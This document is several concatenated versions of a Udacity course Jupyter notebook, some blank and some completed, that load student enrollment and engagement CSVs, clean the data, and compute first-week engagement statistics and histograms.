Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
print(enrollments[0])
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
daily_engagement = read_csv('daily_engagement.csv')
print(daily_engagement[0])
project_submissions = read_csv('project_submissions.csv')
print(project_submissions[0])
###Output
{'total_minutes_visited': '11.6793745', 'num_courses_visited': '1.0', 'lessons_completed': '0.0', 'utc_date': '2015-01-09', 'acct': '0', 'projects_completed': '0.0'}
{'completion_date': '2015-01-16', 'creation_date': '2015-01-14', 'account_key': '256', 'processing_state': 'EVALUATED', 'lesson_key': '3176718735', 'assigned_rating': 'UNGRADED'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def unique_account_key_count(data, key_name='account_key'):
account_key_set = set()
for enrollment in data:
account_key_set.add(enrollment[key_name])
return len(account_key_set)
enrollment_num_rows = len(enrollments)
enrollment_num_unique_students = unique_account_key_count(enrollments)
print('enrollment', enrollment_num_rows, enrollment_num_unique_students)
engagement_num_rows = len(daily_engagement)
engagement_num_unique_students = unique_account_key_count(daily_engagement, key_name='acct')
print('engagement', engagement_num_rows, engagement_num_unique_students)
submission_num_rows = len(project_submissions)
submission_num_unique_students = unique_account_key_count(project_submissions)
print('submission', submission_num_rows, submission_num_unique_students)
###Output
enrollment 1640 1302
engagement 136240 1237
submission 3642 743
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
###Output
_____no_output_____
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
###Output
_____no_output_____
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students =
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week =
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = list(total_minutes_by_account.values())
print('Mean:', np.mean(total_minutes))
print('Standard deviation:', np.std(total_minutes))
print('Minimum:', np.min(total_minutes))
print('Maximum:', np.max(total_minutes))
###Output
_____no_output_____
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
###Output
_____no_output_____
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement =
non_passing_engagement =
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs https://storage.googleapis.com/supplemental_media/udacityu/5430778793/table_descriptions.txt
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
enrollments_filename = 'enrollments.csv'
engagement_filename = 'daily_engagement.csv'
submissions_filename = 'project_submissions.csv'
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
enrollments = read_csv(enrollments_filename)
daily_engagement = read_csv(engagement_filename)
project_submissions = read_csv(submissions_filename)
enrollments
daily_engagement
project_submissions
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del[engagement_record['acct']]
def get_unique_students(data):
unique_students = set()
for data_point in data:
unique_students.add(data_point['account_key'])
return unique_students
unique_enrollment_students = get_unique_students(enrollments)
len(unique_enrollment_students)
len(daily_engagement)
unique_engagement_students = get_unique_students(daily_engagement)
len(unique_engagement_students)
len(project_submissions)
unique_project_submitters = get_unique_students(project_submissions)
len(unique_project_submitters)
###Output
_____no_output_____
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
daily_engagement[0]['account_key']
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
for enrollment in enrollments:
student = enrollment['account_key']
if student not in unique_engagement_students:
print(enrollment)
break
###Output
OrderedDict([('account_key', '1219'), ('status', 'canceled'), ('join_date', datetime.datetime(2014, 11, 12, 0, 0)), ('cancel_date', datetime.datetime(2014, 11, 12, 0, 0)), ('days_to_cancel', 0), ('is_udacity', False), ('is_canceled', True)])
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
num_problem_students = 0
for enrollment in enrollments:
student = enrollment['account_key']
if (student not in unique_engagement_students and enrollment['join_date'] != enrollment['cancel_date']):
print(enrollment)
num_problem_students += 1
num_problem_students
###Output
OrderedDict([('account_key', '1304'), ('status', 'canceled'), ('join_date', datetime.datetime(2015, 1, 10, 0, 0)), ('cancel_date', datetime.datetime(2015, 3, 10, 0, 0)), ('days_to_cancel', 59), ('is_udacity', True), ('is_canceled', True)])
OrderedDict([('account_key', '1304'), ('status', 'canceled'), ('join_date', datetime.datetime(2015, 3, 10, 0, 0)), ('cancel_date', datetime.datetime(2015, 6, 17, 0, 0)), ('days_to_cancel', 99), ('is_udacity', True), ('is_canceled', True)])
OrderedDict([('account_key', '1101'), ('status', 'current'), ('join_date', datetime.datetime(2015, 2, 25, 0, 0)), ('cancel_date', None), ('days_to_cancel', None), ('is_udacity', True), ('is_canceled', False)])
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
if (not enrollment['is_canceled'] or enrollment['days_to_cancel']>7):
account_key = enrollment['account_key']
enrollment_date = enrollment['join_date']
if (account_key not in paid_students or enrollment_date > paid_students[account_key]):
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >= 0
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
paid_enrollments = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submissions = remove_free_trial_cancels(non_udacity_submissions)
print(len(paid_enrollments))
print(len(paid_engagement))
print(len(paid_submissions))
# Number of visits in the first week
for engagement_record in paid_engagement:
if engagement_record['num_courses_visited'] > 0:
engagement_record['has_visited'] = 1
else:
engagement_record['has_visited'] = 0
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week = []
for engagement_record in paid_engagement:
account_key = engagement_record['account_key']
join_date = paid_students[account_key]
engagement_record_date = engagement_record['utc_date']
if within_one_week(join_date, engagement_record_date):
paid_engagement_in_first_week.append(engagement_record)
len(paid_engagement_in_first_week)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
def group_data(data, key_name):
group_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
group_data[key].append(data_point)
return group_data
engagement_by_account = group_data(paid_engagement_in_first_week, 'account_key')
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account, 'total_minutes_visited')
import numpy as np
# Summarize the data about minutes spent in the classroom
def describe_data(data):
total_minute_statistics = []
for total_minute in data.values():
total_minute_statistics.append(total_minute)
print('Mean:', np.mean(total_minute_statistics))
print('Standard deviation:', np.std(total_minute_statistics))
print('Minimum:', np.min(total_minute_statistics))
print('Maximum:', np.max(total_minute_statistics))
describe_data(total_minutes_by_account)
###Output
Mean: 306.70832675342825
Standard deviation: 412.99693340852957
Minimum: 0.0
Maximum: 3564.7332644989997
###Markdown
Debugging Data Analysis Code
###Code
# max(total_minutes_by_account.items(), key=lambda pair: pair[1])
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_minutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_minutes = student
max_minutes
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] == student_with_max_minutes:
print(engagement_record)
###Output
OrderedDict([('utc_date', datetime.datetime(2015, 7, 9, 0, 0)), ('num_courses_visited', 4), ('total_minutes_visited', 850.519339666), ('lessons_completed', 4), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 10, 0, 0)), ('num_courses_visited', 6), ('total_minutes_visited', 872.633923334), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 11, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 777.018903666), ('lessons_completed', 6), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 12, 0, 0)), ('num_courses_visited', 1), ('total_minutes_visited', 294.568774), ('lessons_completed', 2), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 13, 0, 0)), ('num_courses_visited', 3), ('total_minutes_visited', 471.2139785), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 14, 0, 0)), ('num_courses_visited', 2), ('total_minutes_visited', 298.778345333), ('lessons_completed', 1), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 1)])
OrderedDict([('utc_date', datetime.datetime(2015, 7, 15, 0, 0)), ('num_courses_visited', 0), ('total_minutes_visited', 0.0), ('lessons_completed', 0), ('projects_completed', 0), ('account_key', '163'), ('has_visited', 0)])
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
lessons_completed_by_account = sum_grouped_items(engagement_by_account, 'lessons_completed')
describe_data(lessons_completed_by_account)
###Output
Mean: 1.636180904522613
Standard deviation: 3.002561299829423
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
days_visited_by_account = sum_grouped_items(engagement_by_account, 'has_visited')
describe_data(days_visited_by_account)
###Output
Mean: 2.8673366834170855
Standard deviation: 2.2551980029196814
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
# Students who passed the subway project (rated PASSED or DISTINCTION)
passing_keys = ['PASSED', 'DISTINCTION']
passed_subway_students = set(s['account_key'] for s in paid_submissions
                             if s['lesson_key'] in subway_project_lesson_keys
                             and s['assigned_rating'] in passing_keys)
passing_engagement = [e for e in paid_engagement_in_first_week
                      if e['account_key'] in passed_subway_students]
non_passing_engagement = [e for e in paid_engagement_in_first_week
                          if e['account_key'] not in passed_subway_students]
###Output
_____no_output_____
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
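# One possible sketch (illustrative, not the original solution): it reuses
# group_data, sum_grouped_items and describe_data defined above, and assumes
# passing_engagement / non_passing_engagement from quiz 11 have been created.
passing_by_account = group_data(passing_engagement, 'account_key')
non_passing_by_account = group_data(non_passing_engagement, 'account_key')
for metric in ['total_minutes_visited', 'lessons_completed', 'has_visited']:
    print('Passing students -', metric)
    describe_data(sum_grouped_items(passing_by_account, metric))
    print('Non-passing students -', metric)
    describe_data(sum_grouped_items(non_passing_by_account, metric))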
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
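# A possible sketch (illustrative): one histogram per metric and per group,
# reusing the grouping helpers defined above.
%matplotlib inline
import matplotlib.pyplot as plt

for metric in ['total_minutes_visited', 'lessons_completed', 'has_visited']:
    for label, group in [('Passing', passing_engagement),
                         ('Non-passing', non_passing_engagement)]:
        totals = sum_grouped_items(group_data(group, 'account_key'), metric)
        plt.hist(list(totals.values()))
        plt.title('{} students: {}'.format(label, metric))
        plt.show()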
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
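# A possible polished version (illustrative): seaborn is imported for styling,
# and axis labels, a title and an explicit bins argument are added to hist().
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()

days_visited_passing = sum_grouped_items(
    group_data(passing_engagement, 'account_key'), 'has_visited')
plt.hist(list(days_visited_passing.values()), bins=8)
plt.xlabel('Days visited in the first week')
plt.ylabel('Number of students')
plt.title('First-week classroom visits (students who passed the subway project)')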
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
print(enrollments[0])
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
daily_engagement = read_csv('daily_engagement.csv')
project_submissions = read_csv('project_submissions.csv')
print(daily_engagement[0])
###Output
{'lessons_completed': '0.0', 'projects_completed': '0.0', 'utc_date': '2015-01-09', 'num_courses_visited': '1.0', 'acct': '0', 'total_minutes_visited': '11.6793745'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
for a in daily_engagement:
a['account_key'] = a['acct']
del a['acct']
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def get_unique_students(inVar):
unique_students = set()
for a in inVar:
unique_students.add(a['account_key'])
return unique_students
enrollment_num_rows = len(enrollments)
enrollment_num_unique_students = len(get_unique_students(enrollments))
engagement_num_rows = len(daily_engagement)
unique_engagements = get_unique_students(daily_engagement)
engagement_num_unique_students = len(unique_engagements)
submission_num_rows = len(project_submissions)
submission_num_unique_students = len(get_unique_students(project_submissions))
print(enrollment_num_unique_students)
print(engagement_num_unique_students)
print(submission_num_unique_students)
###Output
1302
1237
743
###Markdown
Problems in the Data
###Code
print(daily_engagement[0]['account_key'])
###Output
0
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
for a in enrollments:
if a['account_key'] not in unique_engagements:
print(a)
break
###Output
{'account_key': '1219', 'days_to_cancel': 0, 'is_canceled': True, 'status': 'canceled', 'is_udacity': False, 'cancel_date': datetime.datetime(2014, 11, 12, 0, 0), 'join_date': datetime.datetime(2014, 11, 12, 0, 0)}
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
for a in enrollments:
if a['account_key'] not in unique_engagements and a['join_date'] != a['cancel_date']:
print(a)
###Output
{'account_key': '1304', 'days_to_cancel': 59, 'is_canceled': True, 'status': 'canceled', 'is_udacity': True, 'cancel_date': datetime.datetime(2015, 3, 10, 0, 0), 'join_date': datetime.datetime(2015, 1, 10, 0, 0)}
{'account_key': '1304', 'days_to_cancel': 99, 'is_canceled': True, 'status': 'canceled', 'is_udacity': True, 'cancel_date': datetime.datetime(2015, 6, 17, 0, 0), 'join_date': datetime.datetime(2015, 3, 10, 0, 0)}
{'account_key': '1101', 'days_to_cancel': None, 'is_canceled': False, 'status': 'current', 'is_udacity': True, 'cancel_date': None, 'join_date': datetime.datetime(2015, 2, 25, 0, 0)}
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print(len(non_udacity_enrollments))
print(len(non_udacity_engagement))
print(len(non_udacity_submissions))
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for a in non_udacity_enrollments:
if (not a['is_canceled'] or a['days_to_cancel'] > 7) and (a['account_key'] not in paid_students or a['join_date'] > paid_students[a['account_key']]):
paid_students[a['account_key']] = a['join_date']
print(len(paid_students))
###Output
995
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >=0
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_enrollments = [a for a in non_udacity_enrollments if a['account_key'] in paid_students.keys()]
paid_engagements = [a for a in non_udacity_engagement if a['account_key'] in paid_students.keys()]
paid_submissions = [a for a in non_udacity_submissions if a['account_key'] in paid_students.keys()]
for rec in paid_engagements:
rec['has_visited'] = 1 if rec['num_courses_visited'] > 0 else 0
paid_engagement_in_first_week =[a for a in paid_engagements if within_one_week(paid_students[a['account_key']], a['utc_date'])]
print(len(paid_engagement_in_first_week))
###Output
6919
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
def group_by_key(inList, inKey):
recs_by_account = defaultdict(list)
for rec in inList:
recs_by_account[rec[inKey]].append(rec)
return recs_by_account
engagement_by_account = group_by_key(paid_engagement_in_first_week, 'account_key')
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
